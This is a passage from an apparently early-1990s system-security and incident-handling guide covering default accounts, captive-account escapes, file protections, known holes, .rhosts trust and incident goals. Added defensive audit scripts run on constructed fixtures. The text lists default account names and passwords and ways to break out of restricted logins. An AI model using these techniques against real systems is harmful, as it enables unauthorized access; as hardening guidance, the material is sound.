want to advertise to non-users.

Telnet. Or Terminal. An account designed to let someone just use
this machine as a stepping stone to get to another machine.
It is useful for hiding the origin of an attack.

Guest. Many operating systems are shipped with guest accounts
enabled.

Demo. Not only are several operating systems shipped with a demo
account, but when installing some packages a demo account
is automatically created. All too often the demo account
has write access to some of the system binaries (executable
files).

Games. Or Play. Often the password is Games when the account
name is Play. In some cases this account has the ability to
write to the Games directory, allowing an attacker not only
to play games and snoop around but also to insert Trojan
horses at will.

Mail. Quite often a system is shipped with or is given an
unpassworded mail account so that people can report problems
(like their inability to log in) without logging in. In
two-thirds of the systems that I have observed with such an
account, it was possible to break into the main system
through this account.

Often these default accounts are normal accounts with an
initialization file (.login, .profile, login.cmd, login.bat,
etc.) or an alternate command line interpreter that makes the
account do something non-standard or restricts its actions.
These are generally called “captive accounts” or “turnkey
logins.” Setting up a restricted login so that it stays
restricted is very hard. It should of course be very easy, but
in most cases a mistake is made. The mistakes to look for are
listed below.

Subjobs. It is often the case that a restricted account is set up
to run only a single application. This single application
program is invoked by a startup script or in place of the
standard command interpreter. Very often this program has
an option to spawn a subprocess.
In some cases this might be an arbitrary job (e.g. the
/spawn option to Mail in VMS or “:!” in vi under unix); in
others it might be limited to a small number of programs. In
the former case the problem is immediate; in the latter case,
it is often true that one of these programs in turn allows
arbitrary spawning.
A carefully written subsystem will prevent this (and all
other such problems). Generally these subsystems are
created quickly rather than carefully.

Editors. Most editors are sufficiently powerful that if the
restricted account can use an editor, a way can be found to
cause problems.

Full Filenames. Many restricted subsystems presume that by
resetting the set of places the command interpreter looks
for executable programs (its “search path”) functionality
can be restricted. This might be done by altering the PATH
variable under unix or the logical name table under VMS.
All too often the clever attacker is able to defeat this
plan by using the complete filename of the file of interest.
Sometimes non-standard names for the file are necessary to
circumvent a clever restriction program.

Removable Restriction Files. When a system relies on an
initialization file to provide protection, it is important
that this file cannot be altered or removed. If a restricted
application is able to write to its “home directory,” where
these initialization files are kept, it can often free
itself.

Non-standard Login. Some network access methods do not read or
respect the startup files. Among these are many file
transfer systems. I have often been able to gain privileged
access to a machine by using the login and password from a
captive account with a file transfer facility that didn’t
know that these accounts weren’t “normal.” Many file
transfer facilities have methods for disabling the use of
selected accounts.

Interrupts. It is sad that a number of captive accounts won’t
withstand a single interrupt or suspend character. Try it
just to be sure.

Making sure that you have not made any of the mistakes listed
above is of course not sufficient for having a perfectly safe
system. Avoiding these mistakes, or avoiding the use of captive
accounts at all, is enough to discourage the vast majority of
attackers.
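An added example, not code from the paper: the skeleton of a unix captive login shell that avoids the mistakes in the list above. Installed as the login shell of a captive account, the body of run_captive would be the whole script; it is written as a function here so that the same file can exercise it. The search path and the working directory it sets are assumptions for the example. What it cannot fix is the application itself: if that program can spawn a subjob or an editor, no wrapper helps.

```sh
#!/bin/sh
# Added example, not from the paper: a captive login shell that survives
# the interrupt characters, rebuilds its environment and leaves no
# command interpreter behind.  As a login shell this subshell body is the
# whole script; the caller names the application by its full path.
run_captive() {
    (
        # Interrupt, quit, suspend and hangup characters must not drop the
        # user into a shell.  An ignored signal (SIG_IGN) survives exec,
        # so the application inherits the ignore unless it resets it.
        trap '' INT QUIT TSTP HUP
        # Rebuild the environment instead of trusting what login passed
        # in: fixed absolute search path, default field splitting, no
        # startup-file variables, no cd search path, private umask.
        PATH=/usr/bin:/bin; export PATH
        unset IFS ENV BASH_ENV CDPATH
        umask 077
        cd / || exit 1                  # not a directory the account can write to
        # exec replaces this shell: when the application exits the session
        # ends, and there is no interpreter to fall back into.
        exec "$@"
    )
}

# Stand-alone demonstration: the application sees the rebuilt environment.
run_captive /bin/sh -c 'echo "PATH=$PATH cwd=$(pwd)"'
```

The remaining items in the list are outside the script: the account’s home directory and the file holding this script must not be writable by the account, and the file transfer daemons must be told to refuse the account (BSD-derived ftpd reads the list of refused accounts from /etc/ftpusers). The test below sends the captive shell an interrupt from inside the application and checks that it is still running afterwards.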

Each operating system for each vendor has some particular default
accounts that need to be disabled or otherwise protected.

2.4.1 Unix

Under unix there are a lot of possible default accounts, since
there are so many different vendors. Below is a partial list of
the default accounts that I have successfully used in the past
that are not mentioned above.

Sysdiag. Or diag. This is used for doing hardware maintenance
and should have a password.

Root. Or rootsh or rootcsh or toor. All too often shipped without
a password. Any account with user id 0 is the superuser,
whatever it is called.

Sync. Used to protect the disks when doing an emergency shutdown.
This account should be restricted from file transfer and
other network uses.

Finger. Or who or w or date or echo. All of these have
legitimate uses but need to be set up to be properly
captive.

Among the things that one should do with a new unix system is

grep :: /etc/passwd

to see what unpassworded accounts exist on the system. (This
matches any empty field, so a line whose comment field is empty
shows up as well; the lines that matter are those whose second
field, the encrypted password, is empty.) All of these are worth
special attention.
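An added example, not code from the paper, that does the check above more precisely and adds the two others this section implies: accounts with no password, extra accounts with user id 0, and the presence of the well-known default account names. The file is a parameter so the checks can be run against /etc/passwd on a new machine or against a copy; the sample passwd file at the bottom is constructed for the example, and its hash strings are arbitrary.

```sh
#!/bin/sh
# Added example, not from the paper.  Audit a passwd-format file for the
# conditions discussed above.  Findings are one per line: "<check>:<account>".

# Accounts with an empty password field.  Testing the second field is more
# precise than "grep ::", which also matches a line whose comment field
# (or any other field) happens to be empty.
empty_password_accounts() {
    awk -F: 'NF >= 2 && $2 == "" { print "nopasswd:" $1 }' "$1"
}

# Every account with uid 0 other than root: toor, rootsh, rootcsh and the
# like are full superuser logins whatever they are called.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print "uid0:" $1 }' "$1"
}

# Names that attackers try first (the lists in this section).  Presence is
# not a hole by itself, but each such account needs a password and a
# properly captive shell, so they are listed for review.
well_known_accounts() {
    awk -F: -v names="open help telnet terminal guest demo games play mail sysdiag diag toor rootsh rootcsh sync finger who w date echo" '
        BEGIN { n = split(names, a, " "); for (i = 1; i <= n; i++) known[a[i]] = 1 }
        (tolower($1) in known) { print "default:" $1 }' "$1"
}

audit_passwd_file() {
    empty_password_accounts "$1"
    extra_uid0_accounts "$1"
    well_known_accounts "$1"
}

# Constructed sample (not a real system).  daemon and alice have an empty
# comment field, so "grep ::" would list them although their password
# fields are set; sync and guest really have no password.
make_sample_passwd() {
    printf '%s\n' \
        'root:abJnggxhB/yWI:0:0:root:/:/bin/sh' \
        'toor:abJnggxhB/yWI:0:0:alternate root:/:/bin/csh' \
        'daemon:*:1:1::/:/bin/sh' \
        'sync::2:2:sync:/:/bin/sync' \
        'guest::200:200:Guest:/tmp:/bin/sh' \
        'alice:xyRVYQpJ8s2yM:100:100::/home/alice:/bin/sh' > "$1"
}

f=$(mktemp)
make_sample_passwd "$f"
audit_passwd_file "$f"     # nopasswd:sync nopasswd:guest uid0:toor default:toor default:sync default:guest
rm -f "$f"
```

On the sample, grep :: reports four lines (daemon, sync, guest and alice) while only sync and guest are actually unpassworded; on a large password file that difference is the whole list you would have to read by hand.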

2.4.2 VMS

Since VMS is available from only one vendor, the default accounts
here are better known. On large systems, these appear with
standard well-known passwords. On smaller systems, these
accounts appear with no passwords at all. With the exception of
Decnet, all have been eliminated on systems newer than version
4.6.

Decnet

System
Systest

Field

UETP

Many of the networking and mail delivery packages routinely added
to VMS systems also have well-known passwords. In the past six
months these accounts have been commonly used to break into VMS
systems.

MMPONY

PLUTO

The passwords on all of these accounts should be reset when a new
system is obtained. There are many problems with the DECNET
account and with the Task 0 object. System managers should
obtain one of the standard repair scripts to remove these
vulnerabilities.

2.4.3 CMS

It has been many years since I have seriously used CMS. At last
glance the default configuration seemed to include well-known
passwords for two accounts.

rcsc
operator

2.5 File Protections

With file protections, simple measures can avoid most problems.
Batch jobs should be run on a regular basis to check that the
protections are correct.

Writable Binaries and System Directories. The most common problem
with file protections is that some system binary or
directory is not protected. This allows the attacker to
modify the system. Typically an attacker will alter a
common program, often the directory listing program, to
create a privileged account for him the next time that a
privileged user runs this command.
When possible the system binaries should be mounted
read-only. In any event a program should systematically
find and correct errors in the protection of system files.
“Public” areas for unsupported executables should be
moderated, and these executables should never be used by
privileged users and programs. System data files suffer
from similar vulnerabilities.

Readable Restricted System Files. Just as the encrypted passwords
need to be protected, the system has other data that is
worth protecting. Many computers have passwords and phone
numbers of other computers stored for future use. The most
common use of this type of information is for network mail
being transported via UUCP or protected DECNET. It is
difficult to rework these systems so that this information
would not be necessary, and hence it must be protected. You
have an obligation to protect this data about your neighbors,
just as they have a responsibility to protect similar data
that they have about you.

Home Dirs and Init Files Shouldn’t Be Writable. Checking that
these directories and files can be written only by the owner
will prevent many careless errors. It is also worthwhile to
check that people’s mail archives are not publicly
readable. Though this is not directly a security threat, it
is only one more line of code while writing the rest of
this.

In many versions of the common operating systems special
checks are placed in the command interpreters to prevent
them from using initialization files that were written by a
third party. Even so, there are still at least two types of
interesting attacks. The first is to install a Trojan horse
in the person’s home directory tree rather than in the
initialization file itself, and the second is simply to
remove the initialization files themselves. Often security
weaknesses are remedied through the proper initialization
file, and without these files the vulnerabilities are
re-introduced.

No Unexpected Publicly Writable Files or Directories. There are
of course places and individual files that should be
publicly writable, but these are stable quantities and the
script can ignore them. In practice users seem to react
well to being told about files that they own that are
publicly overwritable.

When Parents Aren’t Owners. While it is not unusual for someone
to have a link to a file outside of his directory structure,
it is unusual for a file in his home directory to be owned
by someone else. Flagging this when the link count is “1”
is worthwhile, since a file with a single link was created
in that directory rather than linked in from elsewhere.

Automated scripts can find these errors before they are
exploited. In general a serious error of one of the types
described above is introduced into a given university cluster
every other week.
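An added example, not code from the paper, of the batch job this section asks for: a Bourne shell script that runs the five checks above over a tree and a passwd-format file, using only find, awk and sed. The lists of system directories, restricted files and public areas, the init file names, and the constructed fixture (including the uid 65000 that stands in for “somebody else”) are assumptions for the example; pathnames are assumed to contain no spaces.

```sh
#!/bin/sh
# Added example, not from the paper: the five file protection checks as a
# batch job.  Arguments: the root of the tree to audit and a passwd-format
# file giving each account's uid and home directory.  Each finding is one
# line: "<check> <path>".

SYSTEM_DIRS="bin etc"                               # writable by owner only
RESTRICTED_FILES="etc/uucp/Systems etc/uucp/L.sys"  # other hosts' passwords and phone numbers
PUBLIC_WRITABLE_OK="tmp"                            # world-writable by design

# 1. Writable binaries and system directories: anything under the system
#    directories that group (-0020) or other (-0002) may write.
check_system_writable() {
    for d in $SYSTEM_DIRS; do
        if [ -d "$1/$d" ]; then
            find "$1/$d" \( -perm -0020 -o -perm -0002 \) -print
        fi
    done | sort | sed 's/^/system-writable /'
}

# 2. Readable restricted system files: readable by other (-0004).
check_restricted_readable() {
    for f in $RESTRICTED_FILES; do
        if [ -e "$1/$f" ]; then
            find "$1/$f" -perm -0004 -print
        fi
    done | sort | sed 's/^/readable-restricted /'
}

# 3. Home directories and init files writable only by the owner, and
# 5. files in a home directory not owned by that account.  A hard link to
#    a file living elsewhere has a link count above 1 and is ignored; a
#    link count of exactly 1 means the file was created here.
check_homes() {
    awk -F: '$6 != "" && $6 != "/" { print $1, $3, $6 }' "$2" |
    while read -r name uid home; do
        [ -d "$home" ] || continue
        find "$home" -prune \( -perm -0020 -o -perm -0002 \) -print |
            sed 's/^/home-writable /'
        for f in .login .profile .cshrc .rhosts .forward; do
            if [ -e "$home/$f" ]; then
                find "$home/$f" \( -perm -0020 -o -perm -0002 \) -print |
                    sed 's/^/home-writable /'
            fi
        done
        find "$home" -type f -links 1 ! -user "$uid" -print | sort |
            sed 's/^/foreign-owner /'
    done
}

# 4. Unexpected world-writable files or directories anywhere else.  Home
#    directories are covered by check 3 and the public areas are pruned.
check_world_writable() {
    prune="-path $1/home"
    for d in $PUBLIC_WRITABLE_OK; do prune="$prune -o -path $1/$d"; done
    find "$1" \( $prune \) -prune -o -perm -0002 -print | sort |
        sed 's/^/world-writable /'
}

audit_file_protections() {
    check_system_writable "$1"
    check_restricted_readable "$1"
    check_homes "$1" "$2"
    check_world_writable "$1"
}

# Constructed fixture (not a real system).  bob's uid in the passwd file is
# 65000, which is not ours, so a file we create in his home is exactly the
# "file owned by somebody else" case; alice and carol get our own uid.
make_sample_tree() {
    r=$1; me=$(id -u); umask 022
    mkdir -p "$r/bin" "$r/etc/uucp" "$r/home/alice" "$r/home/bob/stash" \
             "$r/home/carol" "$r/usr/local/scratch" "$r/tmp"
    chmod 755 "$r/bin" "$r/etc" "$r/etc/uucp" "$r/home" "$r/home/alice" \
              "$r/home/bob" "$r/home/bob/stash" "$r/usr" "$r/usr/local" "$r/usr/local/scratch"
    echo binary > "$r/bin/ls";  chmod 775 "$r/bin/ls"        # group-writable binary
    echo binary > "$r/bin/cat"; chmod 755 "$r/bin/cat"       # correct
    echo 'hostb Any ACU 1200 5551212 ogin: uucp ssword: secret' > "$r/etc/uucp/Systems"
    chmod 644 "$r/etc/uucp/Systems"                          # readable by everyone
    echo 'setenv PATH /bin:/usr/bin' > "$r/home/alice/.login"
    chmod 664 "$r/home/alice/.login"                         # group-writable init file
    echo x > "$r/home/bob/stash/note"; chmod 644 "$r/home/bob/stash/note"  # not bob's, 1 link
    echo y > "$r/home/bob/.plan";      chmod 644 "$r/home/bob/.plan"
    ln "$r/home/bob/.plan" "$r/tmp/plan"                     # link count 2: ignored
    echo z > "$r/usr/local/scratch/data"; chmod 666 "$r/usr/local/scratch/data"
    chmod 777 "$r/home/carol"                                # world-writable home
    chmod 1777 "$r/tmp"
    printf 'root:x:0:0::/:/bin/sh\nalice:x:%s:100::%s/home/alice:/bin/sh\nbob:x:65000:100::%s/home/bob:/bin/sh\ncarol:x:%s:100::%s/home/carol:/bin/sh\n' \
        "$me" "$r" "$r" "$me" "$r" > "$r/etc/passwd"
    chmod 644 "$r/etc/passwd"
}

root=$(mktemp -d)
make_sample_tree "$root"
audit_file_protections "$root" "$root/etc/passwd"
rm -rf "$root"
```

Run against the real root with /etc/passwd, the job is the nightly report the paper describes; the fixture exercises one finding per check and one near miss per check (the correctly protected binary, the hard-linked file) so a change to the script that silently widens or narrows a test is noticed.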

2.6 Well Known Security Holes

While hundreds of security holes exist in commonly used programs,
a very small number of these account for most of the problems.
Under modern versions of VMS, most of them relate to either DECNET
or creating mailboxes.

Under unix, a handful of programs account for most of the
problems. It is not that these bugs are any worse or easier to
exploit than the others, just that they are well known and
popular. The interested reader is referred to the Hackman
Project for a more complete listing.

Set-Uid Shell Scripts. You should not have any set-uid shell
scripts. If you have system source, you should consider
modifying chmod to prevent users from creating set-uid
programs.

FTP. The file transfer utility has had a number of problems,
both in terms of configuration management (remembering to
disallow accounts like “sync” from being used to transfer
files) and legitimate bugs. Patched versions are available
for most systems.

Login. On the Sun 386i and under DEC Ultrix 3.0, until a better
fix is available,

chmod 0100 /bin/login

to protect yourself from a serious security bug.

Sendmail. Probably the only program with as many security
problems as the yellow pages system itself. Again, a patched
version should be obtained for your system.

TFTP. This program should be set to run as an unprivileged user
and/or chrooted.

Rwalld. This program needs to be set to run as an unprivileged
user.

Mkdir. Some versions of unix do not have an atomic kernel call to
make a directory and hence can leave the inodes in a “bad”
state if the mkdir command is interrupted at just the right
moment. If your system is one of these, it is worthwhile to
write a short program that raises the priority of a job while
it is making a directory so as to make it more difficult to
exploit this hole.

YP & NFS. Both present giant security holes. It is important to
arrange to get patches as soon as they become available for
these subsystems, because we can expect more security
problems with them in the future. Sun has recently started
a computer security group that will help solve this set of
problems.

While the ambitious and dedicated system manager is encouraged to
fix all of the security problems that exist, fixing these few
will discourage most of the attackers.
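An added example, not code from the paper, for the first item in the list: a script that lists the set-uid and set-gid files under a directory and flags those that are interpreter scripts. The bits can be found with find alone; telling a script from a binary takes a look at the first two bytes. (The reason set-uid scripts are unsafe on the unix systems of the period is the window between the kernel opening the script to read the “#!” line and the interpreter re-opening it by name, during which the name can be pointed at a different file.) The constructed fixture is an assumption for the example.

```sh
#!/bin/sh
# Added example, not from the paper: report set-uid/set-gid files that are
# scripts (first two bytes "#!").  The correct finding on a healthy system
# is nothing at all.
setuid_scripts() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort |
    while read -r f; do
        # read only the first two bytes, so large binaries cost nothing
        if [ "$(dd if="$f" bs=2 count=1 2>/dev/null)" = '#!' ]; then
            printf 'setuid-script %s\n' "$f"
        fi
    done
}

# Constructed fixture (not a real system): a set-uid shell script, a
# set-uid file that is not a script, and an ordinary script.
make_sample_tree() {
    printf '#!/bin/sh\necho hello\n' > "$1/suidsh";  chmod 4755 "$1/suidsh"
    printf '\177ELFnotreally\n'      > "$1/suidbin"; chmod 4755 "$1/suidbin"
    printf '#!/bin/sh\necho plain\n' > "$1/plain";   chmod 755 "$1/plain"
}

d=$(mktemp -d)
make_sample_tree "$d"
setuid_scripts "$d"        # prints: setuid-script $d/suidsh
rm -rf "$d"
```

Without system source to modify chmod, a nightly run of this together with a diff of the full set-uid list (find / -perm -4000) against a saved baseline gives most of the same benefit: a new set-uid file, script or not, is noticed the next morning.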

2.7 New Security Holes

New security holes are always being found. There are a number of
computer mailing lists and advisory groups that follow this.
Three groups of particular interest are CERT, ZARDOZ and CIAC.

2.7.1 CERT

CERT is a DARPA-sponsored group that helps Internet sites deal
with security problems. They may be contacted as
cert@cert.sei.cmu.edu. They also maintain a 24-hour phone number
for security problems at (412) 268-7090.

2.7.2 ZARDOZ

Neil Gorsuch moderates a computer security discussion group. He
may be contacted as zardoz!security-request@uunet.UU.NET
or security-request@cpd.com.

2.7.3 CIAC

CIAC is the Department of Energy’s Computer Incident Advisory
Capability team led by Gene Schultz. This team is interested in
discovering and eliminating security holes, exchanging security
tools, as well as other issues. Contact CIAC as
ciac@tiger.llnl.gov.

2.8 Excess Services

Every extra network service that a computer offers potentially
poses an additional security vulnerability. I am emphatically
not suggesting that we remove the services that the users are
using; I am encouraging the removal of services that are unused.
If you are not getting a benefit from a service, you should not
pay the price in terms of system overhead or security risk.
Sometimes, as with rexecd under unix, the risks are not
immediately apparent and are caused by unexpected interactions
that do not involve any bugs per se.

2.9 Search Paths

If a user has set his search path to include the current
directory (“.” on unix, and also an empty component such as a
leading or trailing colon), he will almost always eventually have
a serious problem: a command name typed while in a directory that
someone else can write to may run that person’s program instead.
There are a number of security vulnerabilities that this poses as
well as logistical ones. Searching through all of the users’
initialization files and/or through the process table (with ps -e
on BSD-derived unix, which shows each process’s environment) can
detect this problem.
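An added example, not code from the paper, of the initialization-file search this section suggests: a script that finds PATH settings which include the current directory, in the Bourne shell forms PATH=... and export PATH=... and the csh forms setenv PATH ... and set path = ( ... ). It treats an empty component and a relative name as the same problem as “.”, which a simple grep for “.” misses. The init file names and the constructed home directories are assumptions for the example.

```sh
#!/bin/sh
# Added example, not from the paper: find search paths that include the
# current directory.  "." is the obvious form; an empty component (a
# leading or trailing colon, or "::") means the same thing, and a relative
# name such as "bin" is searched relative to wherever the user happens to
# be.  Components beginning with $ or ~ are expansions and are not judged.

# Print the unsafe components of one colon-separated PATH value, one per
# line; empty components are printed as "(empty)".
unsafe_path_components() {
    printf '%s\n' "$1" | awk -F: '{
        for (i = 1; i <= NF; i++) {
            c = substr($i, 1, 1)
            if ($i == "")                                 print "(empty)"
            else if ($i == ".")                           print "."
            else if (c != "/" && c != "$" && c != "~")    print $i
        }
    }'
}

# Print "<file>: <component>" for each unsafe component of every PATH
# setting found in init file $1.
scan_init_file() {
    awk -v file="$1" '
        function report(value,    n, i, parts, c) {
            n = split(value, parts, ":")
            for (i = 1; i <= n; i++) {
                c = substr(parts[i], 1, 1)
                if (parts[i] == "")        printf "%s: (empty)\n", file
                else if (parts[i] == ".")  printf "%s: .\n", file
                else if (c != "/" && c != "$" && c != "~") printf "%s: %s\n", file, parts[i]
            }
        }
        /^[ \t]*(export[ \t]+)?PATH=/ {                  # sh: PATH=... / export PATH=...
            v = $0; sub(/^[ \t]*(export[ \t]+)?PATH=/, "", v)
            sub(/[ \t]*[;#].*$/, "", v)                  # trailing command or comment
            gsub(/["'\'']/, "", v)                       # quotes
            report(v)
        }
        /^[ \t]*setenv[ \t]+PATH[ \t]+/ {                # csh: setenv PATH a:b
            v = $0; sub(/^[ \t]*setenv[ \t]+PATH[ \t]+/, "", v)
            sub(/[ \t]*#.*$/, "", v); sub(/[ \t]+$/, "", v); gsub(/["'\'']/, "", v)
            report(v)
        }
        /^[ \t]*set[ \t]+path[ \t]*=[ \t]*\(/ {          # csh: set path = (a b c)
            v = $0; sub(/^[^(]*\(/, "", v); sub(/\).*$/, "", v)
            sub(/^[ \t]+/, "", v); sub(/[ \t]+$/, "", v)
            gsub(/[ \t]+/, ":", v)                       # list to colon form
            report(v)
        }' "$1"
}

# Scan the usual init files of every home directory under $1.
scan_homes() {
    for h in "$1"/*; do
        for f in .profile .login .cshrc; do
            if [ -f "$h/$f" ]; then scan_init_file "$h/$f"; fi
        done
    done
}

# Constructed fixture (not real users' files).
make_sample_homes() {
    mkdir -p "$1/alice" "$1/bob" "$1/carol"
    printf 'PATH=/bin:/usr/bin:.\nexport PATH\nPATH="$PATH:bin"\n' > "$1/alice/.profile"
    printf 'set path = (/bin /usr/bin $path .)\nsetenv PATH /bin:/usr/ucb:\n' > "$1/bob/.cshrc"
    printf 'PATH=/bin:/usr/bin:$HOME/bin; export PATH\n' > "$1/carol/.login"
}

homes=$(mktemp -d)
make_sample_homes "$homes"
scan_homes "$homes"      # alice: "." and "bin"; bob: "." and "(empty)"; carol: nothing
unsafe_path_components "$PATH"   # the path of the shell running this script
rm -rf "$homes"
```

The same unsafe_path_components test applied to the PATH string shown by the process table covers users who set their path interactively rather than in a file.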

2.10 Routing

Routing can provide cheap partial protection for a computer
center. There are some machines that don’t need to talk to the
outside world at all. On others, one might like to be able to
initiate contact outward but have no real need to allow others
to contact the machine directly.

At an academic computing center where administrative computers
are placed on the same network as the student machines, limiting
routing is often a very good idea. One can set up the system such
that the users on administrative machines can use the resources
of the academic machines without placing the administrative
machines at significant risk of attack from the student machines.

Ideally one would wish to place the machines that need to be
protected on their own local area net, with active routers rather
than repeaters between networks, to prevent an attacker from
“listening in” on the broadcast net. This type of attack is
becoming increasingly popular.

2.11 Humans

In almost all technological systems, the weakest link is the
human beings involved. Since the users, the installers and the
maintainers of the system are (in the average case) all humans,
this is a serious problem.

2.11.1 Managers

Managers, bosses, center directors and other respected people are
often given privileged accounts on a variety of machines.
Unfortunately, they are often not as familiar with the systems as
the programmers and system maintainers themselves. As a result,
they are often the targets of attack. Often they are so busy
that they do not take the security precautions that others would
take, and they do not have the same level of technical knowledge.
They are given these privileges as a sign of respect. They often
ignore instructions to change passwords or file protections.

The attackers rarely show this level of respect. They break into
the unprotected managerial account and use it as a vector to the
rest of the system or center. This leads to embarrassing
situations beyond the break-in itself, as the manager is made to
look personally incompetent and is sometimes accused of being
unfit for his position.

Prevent this type of situation from occurring by giving
privileges only to people who need them and know how to use them.

2.11.2 Secretaries

Secretaries are often given their bosses’ passwords by their
bosses. When a secretary uses his boss’s account, he has all the
privileges that his boss would have and generally does not have
the training or expertise to use them safely.

It is probably not possible to prevent bosses from giving their
passwords to their secretaries. Still, one can reduce the need
for this by setting up groups correctly. One might consider
giving “bosses” two separate accounts, one for routine use and
one for privileged access, in the hope that they will share only
the former with their secretary.

2.11.3 Trojan Horses

Having an “unsupported” or “public” area on disk where users
place binaries for common use simplifies the placement of Trojan
horse programs. Having several areas for user-maintained
binaries, with a single user responsible for each, reduces but
does not eliminate this problem.

2.11.4 Wizards

Wizards and system programmers often add their own security
problems. They are often the ones to create privileged programs
that are needed for a while and then forgotten about without
being disabled. Thinking that an account doesn’t need to be
checked or audited because it is owned by someone who should know
better than to make a silly mistake is a risky policy.

2.11.5 Funders

Funders are often given accounts on the machines that they
“paid for.” All too often these accounts are never used but are
not disabled, even though they are found to be dormant by the
procedures discussed above. Again, this is a mistake to be
avoided.

2.12 Group Accounts

A group account is one that is shared among several people in
such a way that one can’t tell which of the people in the group
is responsible for a given action.

Those of you familiar with Hardin’s “The Tragedy of the Commons”
will understand that this is a problem in any system, computer or
otherwise. Part of the problem here is with passwords.

1. You can’t change the password easily. You have to find
everyone in the group to let them know.

2. If something dumb happens, you don’t know whom to talk to
about it.

3. If someone shares the group password with another person,
you can never find out who did or who all the people who
knew the password were.

Group accounts should always be avoided. The administrative work
to set up several independent accounts is very small in
comparison to the extra effort in disaster recovery for not doing
so.

One must avoid not only the explicit group accounts but also the
implicit ones: where an individual shares his password with
dozens of people, or allows dozens, perhaps hundreds, of them to
use his account through proxy logins or .rhosts.

2.13 .rhosts and proxy logins

Just as some people trust each other, some accounts trust each
other and some machines trust each other. There are several
mechanisms for setting up a trust relationship. Among these are
hosts.equiv, .rhosts, and proxy logins.

These mechanisms essentially allow a user to log in from one
machine to another without a password. There are three basic
implications of this.

1. If you can impersonate a machine, you can gain access to
other machines without having to provide passwords or find
bugs.

2. Once you get access to one account on one machine, you are
likely to be able to reach many other accounts on other
machines.

3. If you gain control of a machine, you have gained access to
all the machines that trust it.

Various experiments have shown that, starting almost anywhere
interesting, once one has control of one medium-sized machine one
can gain access to tens of thousands of computers. In my most
recent experiment, starting from a medium-sized timesharing
system, I gained immediate access to 150 machines and surpassed
5000 distinct machines before completing the second recursion
step.
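An added example, not code from the paper, of the recursion the experiment above describes: a script that turns collected hosts.equiv and .rhosts files into a list of trust edges, points out the “+” entries, and walks the graph breadth first from a host the attacker is assumed to control, printing at which recursion step each further host falls. The directory layout, the parsing conventions and the five constructed hosts are assumptions for the example.

```sh
#!/bin/sh
# Added example, not from the paper: the trust graph of hosts.equiv and
# .rhosts files, and a walk over it.  Layout assumed for every host whose
# files were collected:  <dir>/<host>/etc/hosts.equiv  and
# <dir>/<host>/home/<user>/.rhosts.  An edge "A B" means host A accepts
# password-less logins from host B; "+" as B means from any host at all.

# Print one edge per line: "<trusting> <trusted> <file it came from>".
trust_edges() {
    for hostdir in "$1"/*; do
        host=${hostdir##*/}
        for f in "$hostdir/etc/hosts.equiv" "$hostdir"/home/*/.rhosts; do
            [ -f "$f" ] || continue
            awk -v host="$host" -v src="$f" '
                /^[ \t]*(#|$)/ { next }      # blank or comment
                $1 ~ /^-/      { next }      # -host: an explicit denial grants nothing
                $1 ~ /^\+@/    { next }      # +@netgroup: needs the NIS map, skipped here
                { print host, $1, src }' "$f"
        done
    done
}

# The "+" entries: hosts that trust everyone, with the file to fix.
wildcard_trust() {
    awk '$2 == "+" { print $1, $3 }' "$1"
}

# Breadth-first walk from controlled host $2 over edge file $1.  Prints
# "<step> <host>", where step n is the n-th recursion of "log in wherever
# the hosts reached so far are trusted".
reachable_hosts() {
    edges=$1
    frontier=$2
    reached=" $2 "
    step=0
    printf '0 %s\n' "$2"
    while [ -n "$frontier" ]; do
        step=$((step + 1))
        next=
        for h in $frontier; do
            for t in $(awk -v h="$h" '$2 == h || $2 == "+" { print $1 }' "$edges" | sort -u); do
                case "$reached" in *" $t "*) continue ;; esac
                reached="$reached$t "
                next="$next $t"
                printf '%s %s\n' "$step" "$t"
            done
        done
        frontier=$next
    done
}

# Constructed fixture (no real hosts): one "+" is enough to pull an
# outside host into every machine on the site within four steps.
make_sample_site() {
    for h in alpha beta gamma delta epsilon; do mkdir -p "$1/$h/etc"; done
    mkdir -p "$1/beta/home/joe" "$1/delta/home/root"
    echo 'beta'                  > "$1/alpha/etc/hosts.equiv"   # alpha trusts beta
    printf 'gamma joe\n-delta\n' > "$1/beta/home/joe/.rhosts"   # beta trusts gamma (as joe)
    echo '+'                     > "$1/gamma/etc/hosts.equiv"   # gamma trusts the world
    echo 'beta'                  > "$1/delta/home/root/.rhosts" # delta's root trusts beta
    echo 'delta'                 > "$1/epsilon/etc/hosts.equiv" # epsilon trusts delta
}

site=$(mktemp -d); edges=$(mktemp)
make_sample_site "$site"
trust_edges "$site" > "$edges"
wildcard_trust "$edges"          # gamma, via its hosts.equiv
reachable_hosts "$edges" zeta    # zeta is an outside host the attacker controls
rm -rf "$site" "$edges"
```

The walk counts hosts, not accounts; the real experiment spreads further because every account’s .rhosts on a reached host is another set of edges, and because proxy logins on the VMS side are not in these files at all.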

2.14 Debugging

About one third of the security holes that I have come across
depend on a debugging option being enabled. When installing
system software, always check that all the “debugging” options
that you are not using are disabled.

2.15 Getting People Mad at You

It is sad but true that a small number of sites have gotten
groups of hackers angry at them. In at least two cases, this was
because the hackers had found an interesting security hole, had
tried to contact the administrators of the center and were given
a hard time when they were seriously trying to help.

When one is given a “tip” about a security problem from someone
who won’t identify himself, it is generally worth investigating.
It is not worth trying to trick the informant into giving you his
phone number. It almost never works, and it is the type of
“dirty trick” that will probably get people mad at you and at
the very least prevent you from getting early warnings in the
future.

3 Pre-Planning your Incident Handling

3.1 Goals

Despite your best plans to avoid incidents, they may very well
occur. Proper planning can reduce their severity, cost and
inconvenience. There are about half a dozen different goals that
one can have while handling an incident.

1. Maintain and restore data.

2. Maintain and restore service.

3. Figure out how it happened.

4. Avoid future incidents and escalation.

5. Avoid looking foolish.

6. Find out who did it.

7. Punish the attackers.

The order shown above is what I believe the order of priorities
generally should be. Of course, in a real situation there are
many reasons why this ordering might not be appropriate, and we
will discuss the whens and whys of changing our priorities in the
next section.

For any given site, one can expect that a standard goal
prioritization can be developed. This should be done in advance.
There is nothing so terrible as being alone in a cold machine
room at 4 on a Sunday morning trying to decide whether to shut
down the last hole to protect the system or to try to get a phone
trace done to catch the attacker. It is similarly difficult to
decide in the middle of a disaster whether you should shut down a
system to protect the existing data or do everything you can to
continue to provide service.

No one who is handling the technical side of an incident wants to
make these policy decisions without guidance in the middle of a
disaster. One can be sure that these decisions will be replayed
and re-analyzed by a dozen “Monday morning quarterbacks” who
will explain what should have been done but could not be bothered
to make up a set of guidelines beforehand.

Let us look at each of these goals in a little more detail.

3.1.1 Maintaining and restoring data

To me, the user data is of paramount importance. Anything else
is generally replaceable. You can buy more disk drives, more
computers, more electrical power. If you lose the data, through a
